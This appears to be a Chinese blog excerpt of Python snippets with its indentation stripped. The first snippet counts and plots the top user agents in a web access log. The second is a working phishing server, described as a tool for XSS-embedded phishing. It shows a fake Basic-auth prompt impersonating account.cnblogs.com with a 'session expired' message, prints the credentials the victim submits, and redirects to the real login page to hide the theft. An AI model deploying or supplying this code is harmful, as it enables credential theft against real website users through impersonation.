Count_Equipment("c://access_log","2020-03-11","2020-03-17")

import os,sys,re,time,datetime
from matplotlib.pylab import *
def Count_Equipment(log_name,start_time,end_time):
Agent = []
with open(log_name,"r",encoding="utf-8") as fp:
for each in fp.readlines():
try:
data = each.split()[3][1:]
start_time = time.strftime("%d/%b/%Y",time.localtime(time.mktime(time.strptime(start_time,"%Y-%m-%d"))))
end_time = time.strftime("%d/%b/%Y",time.localtime(time.mktime(time.strptime(end_time,"%Y-%m-%d"))))
if data.split(":")[0] >=start_time and data.split(":")[0] <= end_time:
Agent.append(each.split()[13].replace("\n",""))
except Exception:
pass
dic,list_num = {},set(Agent)
# 合並字典設備類型是key 設備個數是value
for item in list_num:
num = Agent.count(item)
dic[item] = num
# 針對字典中的鍵值對進行排序,大的在前小的在后
item = sorted(dic.items(),key=lambda x:x[1],reverse=True)
dic_news = dict(item[0:10:1]) # 取設備數量最多的前10條記錄
x,y = [],[]
for k in dic_news:
x.append(k)
y.append(dic_news[k])
plt.rcParams["font.sans-serif"] = ["KaiTi"]
plt.title("訪問設備類型前10")
plt.xticks(rotation=70)
for a,b in zip(x,y):
plt.text(a, b, '%.0f' % b, ha='center', va= 'bottom',fontsize=7)
plt.bar(x,y)
plt.legend()
plt.show()
Count_Equipment("c://access_log","2020-03-11","2020-03-17")

構建簡易HTTPBasic認證: Basic認證是由web服務器提供的一種輕便的身份校驗方式,此處實現的工具可用於XSS內嵌釣魚.
import socketserver
import http.server
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if str(self.headers).find('UserLogin=1') > 0:
self.send_response(302)
self.send_header('Location', 'https://account.cnblogs.com/signin')
self.end_headers()
else:
if str(self.headers).find('Authorization: Basic ') > 0:
self.send_response(302)
self.send_header('Set-Cookie', 'UserLogin=1')
self.send_header('Location', 'https://account.cnblogs.com/signin')
print("------------------------------------------------------------")
print(str(self.headers))
else:
self.send_response(401)
self.send_header('Content-type', 'text/html; charset=UTF-8')
self.send_header('WWW-Authenticate',
'Basic realm="Session Out Of Date, Please Login again [account.cnblogs.com]"')
self.end_headers()
httpd = socketserver.TCPServer(("0.0.0.0", 9999), RequestHandler)
httpd.serve_forever()

